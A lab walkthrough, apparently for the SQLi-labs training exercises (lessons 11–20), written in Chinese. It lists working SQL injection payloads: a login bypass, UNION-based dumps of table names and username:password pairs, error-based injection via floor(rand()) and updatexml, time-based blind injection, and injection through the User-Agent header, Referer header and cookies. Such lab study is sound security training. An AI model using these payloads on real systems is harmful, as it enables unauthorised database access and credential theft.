SQLlabs
Basic-Challenges
Less-11: POST-Error based- Single quotes -String
less10后就是post注入,
这题注入挺简单的,用万能密码即可登陆
username: 1' or 1=1 # // #号为注释符
password: 随意
登陆成功
利用burpsuite抓包
判断select 字段
尝试sql注入,在username参数中注入
1' order by 2# ----没有报错
1' order by 3# ---报错:Unknown column '3' in 'order clause'
所以为select语句字段有两列
推测语句 select name,passwd from users where name='$name' and passwd='$passwd'
注入语句:1' union select 1,2
【数据库名和版本】
1' union select database(),version() #
【数据表】
1' union select group_concat(table_name),version() from information_schema.tables where table_schema='security' #
【数据列字段】
1' union select group_concat(column_name),version() from information_schema.columns where table_schema='security' and table_name='users' #
【用户名密码】
1' union select concat_ws(':',username,password),version() from security.users limit 1,1#
Less-12: POST-Error based- Double quotes -String
用户名输入单引号没反应,输入双引号
near '"admin"") and password=("") LIMIT 0,1' at line 1
"admin"") and password=("") LIMIT 0,1
sql语句使用双引号和括号闭合的
【数据库和版本】
") union select database(),version() #
Less-13: POST-Double Injection- Single quotes -String-twist
测试
username:admin’
password:
sql语句由单引号和括号闭
所以注入语句
username:') or 1=1 #
password:123
登陆成功
因为登陆成功不会显示用户名密码,但是语句错误是会显示
所以想到报错注入
【获取表名】
1') union select 1,count(*) from information_schema.tables group by concat('{ ',(select database()),' }', floor(rand(0)*2)) #
Less-14: POST-Double Injection- Double quotes -String-twist
与less=13类似, 双引号闭合
1" union select 1,count(*) from information_schema.tables group by concat('{ ',(select database()),' }', floor(rand(0)*2)) #
Less-15: POST-Blind-Boolian/time Based - Single quotes
测试
admin' or 1=1 #
登陆成功
由于无论怎么注入特殊字符,都只显示登陆失败,没有报错信息
但是万能密码仍可以登陆
这时就考虑时间盲注yan
admin' and sleep(5) # // 延时5s响应
判断当前数据库名长度
admin' and if(length(database())>0,sleep(5),0) #
admin' and if(length(database())=8,sleep(5),0) #
其他语句
admin' and if(ascii(substr(database(),1,1))>114,sleep(5),0) #
admin' and if(ascii(substr(database(),1,1))=115,sleep(5),0) #
...
admin' and if((select length(username) from security.users limit 0,1)>3,sleep(5),0) #
Less-16: POST-Blind-Boolian/time Based - Double quotes
用双引号和括号闭合
admin") or 1=1 #
Less-17: POST-Update Query-Error Based - Single
这是一个密码重置页面
[PASSWORD RESET]
username:123
new password :123'
没有报错信息
username:admin (当用户名存在时,才会报错)
new password :123'
username:admin
new password :123'# 注释
所以后端SQL语句是单引号闭合
推测sql语句: UPDATE users SET password = '$password' WHERE username='$username'
基于报错的sql注入
uname=admin&passwd=123' and (select count(*) from information_schema.tables group by concat('{',(select database()),'}',FLOOR(RAND(0)*2))) #
//注入成功,当前数据库security
接下来就是一顿基操了
【数据表】
uname=admin&passwd=123' and (select count(*) from information_schema.tables group by concat('{',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'}',FLOOR(RAND(0)*2))) #
【列字段】
uname=admin&passwd=123' and (select count(*) from information_schema.tables group by concat('{',(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),'}',FLOOR(RAND(0)*2))) #
【字段内容】
uname=admin&passwd=123' and (select count(*) from information_schema.tables group by concat('{',(select concat_ws(':',username,password) from security.users limit 0,1),'}',FLOOR(RAND(0)*2))) #
【这里有点问题You can’t specify target table ‘users’ for update in FROM clause】就是user表不能重复指定
稍微修改一下语句
uname=admin&passwd=123' and (select count(*) from information_schema.tables group by concat('{',(select * from (select concat_ws(':',username,password) from security.users limit 0,1) as temp),'}',FLOOR(RAND(0)*2))) #
这里再介绍另一种报错注入方式
updatexml注入
【参考:https://www.jb51.net/article/125599.htm
http://www.mamicode.com/info-detail-1665678.html】
PS:这个注入是利用函数第二个参数格式(Xpath格式的字符串)问题而引发的报错,如果不是Xpath格式的字符串就会报错
首先了解下updatexml()函数
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
作用:改变文档中符合条件的节点的值
改变XML_document中符合XPATH_string的值
注入语句
uname=admin&passwd=123' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) #
uname=admin&passwd=123' and updatexml(1,concat(0x7e,((select group_concat(table_name) from information_schema.tables where table_schema='security')),0x7e),1) #
Less-18: POST-Header Injection-Uagent field-Error Based
测试admin:admin登陆成功,显示User-Agent
这次的注入点是http头部,准确的说是http头部的User-Agent字段
登陆失败--------显示IP地址,登陆失败的信息
登陆成功---------显示IP地址,User Agent头部,登陆成功的信息
编辑头部(这里需要正确的用户名密码admin:admin)
报错
可以看出可ip和user-agent可能插入数据库
sql语句:INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)
既然有报错回显,就基于报错的方式来注入
相当于SQL语句【注意括号的闭合】:
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('aaa',(updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1))) #', '127.0.0.1', 'admin')
也就是
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('aaa',(updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)))
【数据表】
aaa',(updatexml(1,concat(0x7e,(SELECT group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))) #
【列字段】
aaa',(updatexml(1,concat(0x7e,(SELECT group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))) #
【字段内容】
aaa',(updatexml(1,concat(0x7e,(SELECT concat_ws(':',username,password) from security.users limit 0,1),0x7e),1))) #
Less-19: POST-Header Injection-Referer field-Error Based
这题与less-18注入方法一样,只是注入点为Referer
利用单引号报错
Less-20: POST-Cookie Injection-Uagent field-Error Based
输入正确用户名密码
开启抓包,刷新页面
在cookie field中加个单引号
页面报错了,位置:near ''admin'' LIMIT 0,1' at line 1
判断sql语句是单引号闭合
所以,用单引号闭合,基于报错注入
Cookie: uname=admin' and (updatexml(1,concat(0x7e,(select @@version),0x7e),1))#
Less-21 & Less-22
放在Advanced Injection